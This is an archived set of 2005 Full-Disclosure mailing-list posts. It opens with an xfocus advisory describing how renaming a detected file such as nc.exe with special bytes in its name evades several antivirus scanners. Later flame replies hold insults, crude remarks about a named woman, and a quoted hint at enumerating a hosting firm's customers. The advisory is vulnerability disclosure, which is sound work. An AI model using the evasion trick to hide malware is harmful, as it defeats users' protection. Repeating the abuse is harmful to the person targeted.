ClamWin Antivirus
Avast Antivirus
RAV AntiVirus
Microsoft AntiSpyware

tested anti-virus vendor:

Symantec AntiVirus Corporate 8.0
Kaspersky Antivirus Personal Pro 4.5.0.104
Kaspersky Antivirus For MS NTServer 4.5.0.104
F-Prot Antivirus 3.16c
ClamWin Antivirus 0.87
Avast.Professional.Edition.v4.6.603
RAV.AntiVirus.Desktop.v8.6
Microsoft AntiSpyware beta1


1.Summary:


   Windows system may use the many kinds of special mark as filename,
some anti-virus engines are unable to analyze the special structure
document filename, thus failed to file operate.


2. Detail:

   Demonstration here:

   Choose a malicious file which would be detected, such as nc.exe,
rename the file as nc??.exe (?? =Hex C0 D7 BA DC)

   Then these malicious files will be not detected by antivirus scan.

   Because these special names are unable directly to input, so if you
want to run these file, you should use the following way:

   [EMAIL PROTECTED]:\Vul\bugtrap]#dir /x

   1998-01-03  14:3759,392 NC294E~1.EXE nc??.exe

   [EMAIL PROTECTED]:\Vul\bugtrap]#NC294E~1.EXE -help
   [v1.10 NT]
   connect to somewhere:   nc [-options] hostname port[s] [ports] ...
   listen for inbound: nc -l -p port [options] [hostname] [port]
   options:

   Uses the MS-DOS name specification, we can operate file with Open、
Read、Write、 and duplicate。

   In fact the most vendor all have the problem in regarding this king
of file parse: For instance use the right key clicks these kinds of
file, will be no scan option menu to show by Kaspersky antivirus, and
Symantec AntiVirus Corporate V10.0.1.1000 will detected but can't remove
it. AVG Anti-Virus will be passed by normally path scan mothod, but
can't read the file if click the scan option menu.


3. Credits:

   Thank [EMAIL PROTECTED] translate it, thx all members of xfocus team
and all support xfocus team.


4. About xfocus:


 Xfocus is a non-profit and free technology organization which
was
founded in 1998 in China. We are devoting to research and demonstration
of weaknesses related to network services and communication security.

 homepage http://www.xfocus.org/

-EOF

--

Kind Regards,

---
[EMAIL PROTECTED]

XFOCUS Security Team
http://www.xfocus.org



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Three years and ten months without a patch

[Marco Ermini]

On 11/15/05, InfoSecBOFH <[EMAIL PROTECTED]> wrote:
> So why not start teaching some lessons David and release exploit code.
>  It seems that is the only way they learn and take thing seriously.

Rarely this software did not run in a what is considered "secured"
environment - I mean, this is rarely exposed on Internet/DMZs. Usually
Oracle DB (especially these older versions which didn't have so much
web application software) are used just as database back end, which
communicates with DMZs through multiple firewall levels (I am not
justifying them in any way, I am just guessing why they may not care
so much). Security is considered often not important - especially if
you can "inexpensively" upgrade to a 9.x or 10.x or 11.x software
version which "never breaks"...


Cheers.
--
Marco Ermini
Dubium sapientiae initium. (Descartes)
[EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research
(This message is for the designated recipient only and may contain
privileged or confidential information. If you have received it in
error, please notify the sender immediately and delete the original.)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Was: n3td3v.com, SHUT THE FUCK UP!

[ad]

Damn shut the fuck up all bunch of kiddies
searching friends and leave FD for what it is , SECURITY!

 









De :
[EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] De la part de poo
Envoyé : mercredi 16 novembre
2005 10:05
À :
full-disclosure@lists.grok.org.uk
Objet : Re: [Full-disclosure]
Was: n3td3v.com, now: C.Meinel



 

throw the filthy wench
off the starboard bow yaaar



On 11/16/05, InfoSecBOFH
<[EMAIL PROTECTED]> wrote:


On 11/15/05, Byron Sonne <[EMAIL PROTECTED]>
wrote:
>  > Carolyn Meinel wrote: 
>
> I'd be wary of anything Ms. Meinel has to say:
> http://attrition.org/errata/charlatan/shame/index2.html
>
> The info's old but some leopards don't change their spots. 

and some never deserved their spots in the first place...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/






-- 
smile tomorrow will be worse 






___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How to discover customers of hosting company for n3td3v.com

[poo]

hey carolyn where the nekkid pics at?
On 11/15/05, Epic <[EMAIL PROTECTED]> wrote:
Carolyn Meinel wrote:> That silly post about n3td3v.com led to fun playtimes with the
> Scottsdale, AZ web farm that hosts it.>> Name:n3td3v.com> Address:  64.202.167.129>> Nslookup of 
64.202.167.129 gives:> Name:pwdynamic-v02.prod.mesa1.secureserver.net> Address:  64.202.167.120>
> A traceroute of 64.202.167.129 gives its IP address> as  ip-64-202-167-129.secureserver.net.>> Want to know all the fun customers using websites on related
> secureserver.net servers? Insert numbers per examples:> http://documents.secureserver.net/show/document.aspx?plvid=1&name=stats_eula
>> (GoDaddy.com)> http://documents.secureserver.net/show/document.aspx?plvid=2&name=stats_eula
>> ...> http://documents.secureserver.net/show/document.aspx?plvid=111702&name=stats_eula>
> etc.>> How does one develop the procedure for uncovering all these users as> noted above? That is left as an exercise for the student. Hint: it is> trivial.>> Carolyn Meinel
> http://techbroker.com> http://happyhacker.org> 505-281-9675>>> ___
> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - 
http://secunia.com/>Whoa. Absolutely stunning.___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/-- smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Was: n3td3v.com, now: C.Meinel

[poo]

throw the filthy wench off the starboard bow yaaar
On 11/16/05, InfoSecBOFH <[EMAIL PROTECTED]> wrote:
On 11/15/05, Byron Sonne <[EMAIL PROTECTED]> wrote:>  > Carolyn Meinel wrote:
>> I'd be wary of anything Ms. Meinel has to say:> http://attrition.org/errata/charlatan/shame/index2.html>> The info's old but some leopards don't change their spots.
and some never deserved their spots in the first place...___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/-- smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Not the real n3td3v

[poo]

yeah we want gobbles !!
gobble gobble gobble 
On 11/15/05, Rembrandt <[EMAIL PROTECTED]
> wrote: 
On Tue, 15 Nov 2005 12:21:02 -0600n3td3v n3td3v <
[EMAIL PROTECTED] > wrote:> People,> actions such as this are what keeps these things going.ack> Until people just ignore idiots it will still happen.ack> You expect to send something like this to a person and expect them to go 
> away?Yes "they" doIt's interesting how many people answer to such mails.Isn't it? ;-)Kind regards,Rembrandt___Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/ -- smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/